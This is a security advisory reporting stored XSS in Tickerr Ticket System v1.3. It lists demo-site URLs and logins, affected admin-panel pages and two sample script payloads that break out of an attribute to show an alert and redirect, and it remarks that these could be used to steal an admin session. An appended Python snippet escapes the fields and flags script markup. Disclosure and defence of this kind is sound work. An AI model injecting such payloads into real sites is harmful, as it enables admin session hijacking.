Tickerr - Ticket System v1.3 Stored XSS Injection - CXSecurity.com

Vulnerability ID 1598186 Vulnerability type
Published 2019-05-07 Updated 2019-05-07
Platform N/A CVSS score N/A
[*] :: Title: Tickerr - Ticket System v1.3 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-07
[*] :: Software: Tickerr - Ticket System v1.3
[?] :: Technical Details & Description:
# Weak security measures, such as poor filtering of input field data, have been discovered in the «Tickerr - Ticket System». The current version of this web application is 1.3.

[?] :: Demo Website:
# https://codecanyon.net/item/tickerr-ticket-system/12818390
# Frontend: http://sglancer.com/Tickerr/guest/new-ticket
# Frontend: http://sglancer.com/Tickerr/guest/new-bug-report
# Backend: http://sglancer.com/Tickerr/
# Login/Password (admin): Admin/123456
# Login/Password (agent): Agent/123456
# Login/Password (client1): Client1/123456
# Login/Password (client2): Client2/123456

[!] :: Special Note:
# 260 Sales
# Unauthenticated Stored XSS Injections are more interesting because you can interact with the admin panel («Bugs», «Tickets» and the panel main screen sections).

[!] :: For developers:
# Disabling any data changes on demo websites doesn't make your applications more secure. It's good for business and sales, but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# http://sglancer.com/Tickerr/panel/admin/free-bugs
# http://sglancer.com/Tickerr/panel/admin/all-bugs
# http://sglancer.com/Tickerr/panel/my-bugs
# http://sglancer.com/Tickerr/panel/bug/pAeJ9GbuwO
# http://sglancer.com/Tickerr/bug/98wM06PG7j/
# http://sglancer.com/Tickerr/ticket/ujq2izfeWz/

[+] :: PoC [Authenticated Stored XSS Injections]:
# Go to the demo website http://sglancer.com/Tickerr and log in as admin/agent. Go to the «Bugs» or «Tickets» section, create or edit any existing report/ticket and use the «Subject» field for payload injection.
# Sample payload: "><script>alert('YOUR FLESH IS AN INSULT TO THE PERFECTION OF THE DIGITAL. - QUIXSS');location='https://twitter.com/quixss';</script>

[+] :: PoC [Unauthenticated Stored XSS Injections]:
# Go to the demo website and press the «Create ticket as guest» or «Leave bug report as guest» button; you'll then see a new page with a simple form where the fields «YOUR NAME» and «SUBJECT*» are vulnerable to XSS Injections. Keep in mind that submitted reports/tickets are reflected inside the admin panel, so it's really easy to steal the admin session, for example.
# Sample payload: "><script>alert('QUIXSS');location='https://twitter.com/quixss';</script>
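The defender-side counterpart to the two PoCs above, added here as example code that is not part of the advisory or of Tickerr: the guest-form values («YOUR NAME», «SUBJECT») are escaped for the HTML attribute and text contexts the `">` payload breaks out of before they reach the admin panel, and incoming submissions are checked for script markup so they can be alerted on. The row markup, field names and sample submissions are constructed assumptions.

```python
import html
import re

# Constructed sample guest submissions modelled on the Tickerr guest form;
# the second one carries the advisory's sample payload in the name field.
GUEST_SUBMISSIONS = [
    {"name": "Alice", "subject": "Login page returns 500"},
    {"name": "\"><script>alert('QUIXSS');location='https://twitter.com/quixss';</script>",
     "subject": "Broken image on the dashboard"},
    # Legitimate special characters must survive escaping without breaking markup.
    {"name": "Bob", "subject": "Price < 100 & > 50"},
]

# Markers of active content in a field that should only ever hold plain text.
SCRIPT_MARKERS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)


def render_ticket_row(ticket: dict) -> str:
    """Render one admin-panel table row (assumed markup) with every untrusted
    value escaped. quote=True also encodes the double quote, so a value that
    starts with '">' cannot close the title attribute it is placed in."""
    name = html.escape(ticket["name"], quote=True)
    subject = html.escape(ticket["subject"], quote=True)
    return (f'<tr><td title="{name}">{name}</td>'
            f'<td title="{subject}">{subject}</td></tr>')


def flag_suspicious(submission: dict) -> list:
    """Detection side: return the names of the fields whose raw value contains
    script markup, so guest submissions can be logged and reviewed before an
    admin opens the «Tickets» or «Bugs» section."""
    return [field for field, value in submission.items()
            if SCRIPT_MARKERS.search(value)]


if __name__ == "__main__":
    for submission in GUEST_SUBMISSIONS:
        print(flag_suspicious(submission), render_ticket_row(submission))
```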